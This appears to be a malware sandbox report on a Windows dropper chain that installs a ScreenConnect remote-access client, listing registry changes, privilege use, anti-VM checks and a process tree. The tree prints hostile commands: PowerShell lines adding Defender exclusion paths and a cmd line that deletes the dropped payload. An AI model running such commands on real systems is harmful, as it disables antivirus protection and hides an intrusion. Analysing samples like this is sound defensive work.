\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4Z894j.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b61f5c2478.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e3c1c56297b3270b0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e3c1c5620000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900e3c1c562000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1de3c1c562000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e3c1c56200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3302d26666d341748cb9b86600ad2546.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3302d26666d341748cb9b86600ad2546.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 728 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 13 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe -
Modifies registry class 37 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\UseOriginalUrlEncoding = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC\Full msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media\1 = ";" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AdvertiseFlags = "388" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Version = "402849799" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Assignment = "1" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductName = "ScreenConnect Client (98a59bd0eed9222b)" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\URL Protocol msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\PackageCode = "D32D1EE57AD9200EF07A7D4C08AB00DC" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\ = "ScreenConnect Client (98a59bd0eed9222b) Credential Provider" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductIcon = "C:\\Windows\\Installer\\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\\DefaultIcon" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media msiexec.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4640 1a50E5.exe 4640 1a50E5.exe 1804 skotes.exe 1804 skotes.exe 5100 2b2046.exe 5100 2b2046.exe 5068 skotes.exe 5068 skotes.exe 1876 NN9Dd7c.exe 2880 powershell.exe 2880 powershell.exe 376 powershell.exe 376 powershell.exe 2180 msedge.exe 2180 msedge.exe 2680 msedge.exe 2680 msedge.exe 5100 2b2046.exe 5100 2b2046.exe 5100 2b2046.exe 5100 2b2046.exe 4980 3302d26666d341748cb9b86600ad2546.exe 4980 3302d26666d341748cb9b86600ad2546.exe 1956 JQY6PX392UESHKN5CCVSO6ZYV061P.exe 1956 JQY6PX392UESHKN5CCVSO6ZYV061P.exe 3244 identity_helper.exe 3244 identity_helper.exe 1956 JQY6PX392UESHKN5CCVSO6ZYV061P.exe 1956 JQY6PX392UESHKN5CCVSO6ZYV061P.exe 1956 JQY6PX392UESHKN5CCVSO6ZYV061P.exe 4624 b61f5c2478.exe 4624 b61f5c2478.exe 3716 skotes.exe 3716 skotes.exe 6488 0SRXIEMGZAWB2BHOD8QO4G52BFC5.exe 6488 0SRXIEMGZAWB2BHOD8QO4G52BFC5.exe 6348 3K21A.exe 6348 3K21A.exe 4960 4Z894j.exe 4960 4Z894j.exe 4960 4Z894j.exe 4960 4Z894j.exe 4960 4Z894j.exe 5324 msiexec.exe 5324 msiexec.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe 5328 36599ddf00.exe 5328 36599ddf00.exe 2184 skotes.exe 2184 skotes.exe 5152 1a713a333e.exe 5152 1a713a333e.exe 5152 1a713a333e.exe 5152 1a713a333e.exe 5152 1a713a333e.exe 5152 1a713a333e.exe 5152 1a713a333e.exe 5152 1a713a333e.exe 5152 1a713a333e.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1876 NN9Dd7c.exe Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 376 powershell.exe Token: SeDebugPrivilege 1720 746f41769d294a238d0d787c1fb39ef6.exe Token: SeDebugPrivilege 1956 JQY6PX392UESHKN5CCVSO6ZYV061P.exe Token: SeDebugPrivilege 4624 b61f5c2478.exe Token: SeDebugPrivilege 4960 4Z894j.exe Token: SeDebugPrivilege 5876 ga70pjP.exe Token: SeShutdownPrivilege 6128 msiexec.exe Token: SeIncreaseQuotaPrivilege 6128 msiexec.exe Token: SeSecurityPrivilege 5324 msiexec.exe Token: SeCreateTokenPrivilege 6128 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 6128 msiexec.exe Token: SeLockMemoryPrivilege 6128 msiexec.exe Token: SeIncreaseQuotaPrivilege 6128 msiexec.exe Token: SeMachineAccountPrivilege 6128 msiexec.exe Token: SeTcbPrivilege 6128 msiexec.exe Token: SeSecurityPrivilege 6128 msiexec.exe Token: SeTakeOwnershipPrivilege 6128 msiexec.exe Token: SeLoadDriverPrivilege 6128 msiexec.exe Token: SeSystemProfilePrivilege 6128 msiexec.exe Token: SeSystemtimePrivilege 6128 msiexec.exe Token: SeProfSingleProcessPrivilege 6128 msiexec.exe Token: SeIncBasePriorityPrivilege 6128 msiexec.exe Token: SeCreatePagefilePrivilege 6128 msiexec.exe Token: SeCreatePermanentPrivilege 6128 msiexec.exe Token: SeBackupPrivilege 6128 msiexec.exe Token: SeRestorePrivilege 6128 msiexec.exe Token: SeShutdownPrivilege 6128 msiexec.exe Token: SeDebugPrivilege 6128 msiexec.exe Token: SeAuditPrivilege 6128 msiexec.exe Token: SeSystemEnvironmentPrivilege 6128 msiexec.exe Token: SeChangeNotifyPrivilege 6128 msiexec.exe Token: SeRemoteShutdownPrivilege 6128 msiexec.exe Token: SeUndockPrivilege 6128 msiexec.exe Token: SeSyncAgentPrivilege 6128 msiexec.exe Token: SeEnableDelegationPrivilege 6128 msiexec.exe Token: SeManageVolumePrivilege 6128 msiexec.exe Token: SeImpersonatePrivilege 6128 msiexec.exe Token: SeCreateGlobalPrivilege 6128 msiexec.exe Token: SeCreateTokenPrivilege 6128 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 6128 msiexec.exe Token: SeLockMemoryPrivilege 6128 msiexec.exe Token: SeIncreaseQuotaPrivilege 6128 msiexec.exe Token: SeMachineAccountPrivilege 6128 msiexec.exe Token: SeTcbPrivilege 6128 msiexec.exe Token: SeSecurityPrivilege 6128 msiexec.exe Token: SeTakeOwnershipPrivilege 6128 msiexec.exe Token: SeLoadDriverPrivilege 6128 msiexec.exe Token: SeSystemProfilePrivilege 6128 msiexec.exe Token: SeSystemtimePrivilege 6128 msiexec.exe Token: SeProfSingleProcessPrivilege 6128 msiexec.exe Token: SeIncBasePriorityPrivilege 6128 msiexec.exe Token: SeCreatePagefilePrivilege 6128 msiexec.exe Token: SeCreatePermanentPrivilege 6128 msiexec.exe Token: SeBackupPrivilege 6128 msiexec.exe Token: SeRestorePrivilege 6128 msiexec.exe Token: SeShutdownPrivilege 6128 msiexec.exe Token: SeDebugPrivilege 6128 msiexec.exe Token: SeAuditPrivilege 6128 msiexec.exe Token: SeSystemEnvironmentPrivilege 6128 msiexec.exe Token: SeChangeNotifyPrivilege 6128 msiexec.exe Token: SeRemoteShutdownPrivilege 6128 msiexec.exe Token: SeUndockPrivilege 6128 msiexec.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 6128 msiexec.exe 6128 msiexec.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4712 wrote to memory of 2208 4712 0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c.exe 82 PID 4712 wrote to memory of 2208 4712 0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c.exe 82 PID 4712 wrote to memory of 2208 4712 0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c.exe 82 PID 2208 wrote to memory of 2744 2208 u5u31.exe 83 PID 2208 wrote to memory of 2744 2208 u5u31.exe 83 PID 2208 wrote to memory of 2744 2208 u5u31.exe 83 PID 2744 wrote to memory of 4640 2744 M2G14.exe 84 PID 2744 wrote to memory of 4640 2744 M2G14.exe 84 PID 2744 wrote to memory of 4640 2744 M2G14.exe 84 PID 4640 wrote to memory of 1804 4640 1a50E5.exe 85 PID 4640 wrote to memory of 1804 4640 1a50E5.exe 85 PID 4640 wrote to memory of 1804 4640 1a50E5.exe 85 PID 2744 wrote to memory of 5100 2744 M2G14.exe 86 PID 2744 wrote to memory of 5100 2744 M2G14.exe 86 PID 2744 wrote to memory of 5100 2744 M2G14.exe 86 PID 1804 wrote to memory of 1876 1804 skotes.exe 88 PID 1804 wrote to memory of 1876 1804 skotes.exe 88 PID 1804 wrote to memory of 1876 1804 skotes.exe 88 PID 1876 wrote to memory of 2880 1876 NN9Dd7c.exe 90 PID 1876 wrote to memory of 2880 1876 NN9Dd7c.exe 90 PID 1876 wrote to memory of 2880 1876 NN9Dd7c.exe 90 PID 1876 wrote to memory of 376 1876 NN9Dd7c.exe 92 PID 1876 wrote to memory of 376 1876 NN9Dd7c.exe 92 PID 1876 wrote to memory of 376 1876 NN9Dd7c.exe 92 PID 1876 wrote to memory of 4980 1876 NN9Dd7c.exe 96 PID 1876 wrote to memory of 4980 1876 NN9Dd7c.exe 96 PID 1876 wrote to memory of 4980 1876 NN9Dd7c.exe 96 PID 1876 wrote to memory of 1720 1876 NN9Dd7c.exe 97 PID 1876 wrote to memory of 1720 1876 NN9Dd7c.exe 97 PID 1720 wrote to memory of 2680 1720 746f41769d294a238d0d787c1fb39ef6.exe 98 PID 1720 wrote to memory of 2680 1720 746f41769d294a238d0d787c1fb39ef6.exe 98 PID 2680 wrote to memory of 116 2680 msedge.exe 99 PID 2680 wrote to memory of 116 2680 msedge.exe 99 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c.exe"C:\Users\Admin\AppData\Local\Temp\0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u5u31.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u5u31.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\M2G14.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\M2G14.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1a50E5.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1a50E5.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\leafidvi"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:376
-
-
C:\leafidvi\3302d26666d341748cb9b86600ad2546.exe"C:\leafidvi\3302d26666d341748cb9b86600ad2546.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4980 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\leafidvi\3302d26666d341748cb9b86600ad2546.exe" & rd /s /q "C:\ProgramData\90H4ECB16P8Y" & exit8⤵
- System Location Discovery: System Language Discovery
PID:4112 -
C:\Windows\SysWOW64\timeout.exetimeout /t 109⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:728
-
-
-
-
C:\leafidvi\746f41769d294a238d0d787c1fb39ef6.exe"C:\leafidvi\746f41769d294a238d0d787c1fb39ef6.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://apps.microsoft.com/store/detail/9MSZ40SLW145?ocid=&referrer=psi8⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x130,0x170,0x7ffb492546f8,0x7ffb49254708,0x7ffb492547189⤵PID:116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,4171602498077391023,8496927748705102063,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:29⤵PID:3484
-
-
